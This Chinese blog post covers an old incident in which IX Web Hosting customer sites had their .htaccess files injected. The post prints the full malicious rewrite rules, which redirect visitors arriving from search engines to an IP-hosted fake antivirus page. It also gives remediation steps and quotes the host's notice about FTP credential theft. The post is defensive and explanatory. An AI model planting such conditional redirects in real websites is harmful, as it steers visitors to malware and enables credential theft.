关于IXwebhosting上出现的安全问题
![]() | ![]() | ![]() | ![]() |
| 【性价之王】 | 【线路之王】 | 【价格之王】 | 【配置之王】 |
| 【免费之王】 | 【香港首推】 | 【梯子之王】 | 【独服之王】 |
症状:直接进入网站没有问题,从google等国外著名搜索引擎进入网站就会转向到一个病毒网站。
具体例子请看: http://bbs.idcspy.com/thread-36706-1-1.html
原因: 网站的.htaccess文件被修改,会加入如下代码:
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://89.28.13.202/in.html?s=ix [R,L]
上面的代码就是判断访问者来源,如果是来自上面那些搜索引擎,就自动转向
解决方法: 修正.htaccess,并且去掉.htaccess的写入权限。同时修正根目录的权限,去掉写入权限。
来自IXwebhosting官方的信息,此安全隐患已经得到修正,他们也杀掉了服务器上大部分此类病毒,如果还有问题,请联系ixwebhosting检查。被感染的原因可能是由于你的ftp密码被盗,进而被修改网站文件。
下面是ixwebhosting关于此问题发给用户的信件:
In our ongoing commitment to the security of our customers, we have discovered a vulnerability located within many of our client’s websites, including yours. This is a self replicating virus which is found by visiting well-known search engines. When you click on any link it may redirect you to a fake Anti-Virus 2009 website which appears to scan your system and then asks you to download the software. Once downloaded and installed it begins displaying pop ups on your desktop. At this time it collects your FTP user name and password from your own computer and uses that information to upload an exploited file named “.htaccess” to your website. Any visitors to your website will then be redirected to the fake anti-virus website.
We have dedicated our systems administration team to finding a solution to this and are happy to say that as one of the first hosting companies we have successfully cleaned all instances of this virus from our servers more than a week ago, and are continually scanning them to ensure your site does not become re-infected.
While your website is now secure, your computer may still be at risk. Here are two easy steps that will detect and remove this malicious software from your computer and make sure your website will not spread the virus again:
1. Uninstall the fake Anti-Virus software by following the instructions at this link:
http://www.bleepingcomputer.com/ … tall-antivirus-2009
2. Once removed, change your FTP password from within your web hosting control panel. Once logged in, click on the FTP Manager icon and then on the icon next to the password to change it.
To illustrate the severity of the issue I would like to share some facts with you:
* 26,991 of our customers have been infected with fake Anti-Virus 2009
* 79,469 websites have been spreading the Anti-Virus 2009 infection
* 120,923 malicious files have been removed from our system
We are constantly monitoring our servers for potential threats to your website, and are proud to say that we are among the first web hosts to identify this particular problem, and have been the first to offer a resolution. Your continued and safe presence on the internet is our top priority.
If you have questions regarding any of this information, please contact our support team anytime.
Kind Regards,
Fatima Said, CCO
IX Web Hosting
猜你可能想看的VPS
- ¥34.99 月 512M 内存 10G SSD 500G 流量 100全球[VPS测评]
- $6 月 2 核 CPU 5G 内存 100G SSD 100Mbps 全球[VPS测评]
- 按小时计费 80M 主机→香港沙田机房 CN2 GIA 线路 年付低至 香港VPS[主机]
- 线路不行-Sentris→$24.99 3 年 512MB 内存 20G虚拟空间(主机)
- Name.com 4 月域名促销全球[VPS测评]
- RUVDS→30 卢布 月-512MB 10GB 无限流量 俄罗斯全球[VPS测评]
- mysql 替换字段指定内容的方法全球[VPS测评]
- BudgetVM→$80 月 E3-1230v2 16GB 内存 480日本VPS[主机]
- 百度高速下载神器PanDownload2.0.6更新 功能更强大全球[VPS测评]
- 忘记WordPress后台密码要如何找回或修改密码全球[VPS测评]
- 全世界最便宜的域名注册商 Porkbun .com 域名首年付4.15刀全球[VPS测评]
- 微基主机 洛杉矶Cera高防VPS 1G内存/30G硬盘/CN2GIA/全球[VPS测评]
- 搬瓦工新年优惠码还有效,全场VPS12.22%折扣,香港和日本CN2GI日本VPS[主机]
- 2美元的便宜 VPS 推荐 更新中全球[VPS测评]
- OG协议对博客Google SEO优化有什么帮助?全球[VPS测评]
- AKARWEB 3.2$ 月 土耳其 1C1G30G硬盘 1Gbps无限全球[VPS测评]
- Xurver-4.99€ 月 荷兰 1核2G内存30G硬盘 1Gbps不全球[VPS测评]
- HKServerSolution 4核心 4G内存 20G SSD 3T全球[VPS测评]
- 缓解云计算人才焦渴,苏州工业园区用三年引得源头活水来全球[VPS测评]
- 向日葵-漏洞科普:海外云服务器三种漏洞修复方法快收藏起来!全球[VPS测评]
- 跨境贸易和跨境电商的三大区别简单分析全球[VPS测评]
- 厘米云,江苏移动100G高防云服务器,4核4G内存20M带宽79元/月全球[VPS测评]
- 潮科技|阿里云发布第七代高主频云服务器ECS和含光800云服务器全球[VPS测评]
- 无忧云,香港VPS全线5折促销,四川高防服务器/大连BGP/德阳高防/深香港VPS[主机]
- 好朋友51WORLD启动“地球克隆计划5”,我要去元宇宙参加了全球[VPS测评]
- 消费复苏形势良好,我们将多措并举实施扩大内需政策全球[VPS测评]
- Linux chown -R 指令介绍与使用全球[VPS测评]
- 初忆云:湖北电信云服务器1核2G仅6.8/月,81.6元/年;香港cn2香港VPS[主机]
- 华纳云年终钜惠活动:云服务器半年低至280元,香港高防服务器999元香港VPS[主机]
- 麻花云双12活动:香港CN2云主机首月9元;安徽移动vps月付29元香港VPS[主机]
转载请注明原文地址:http://140.238.13.167:12355/read-110094.html











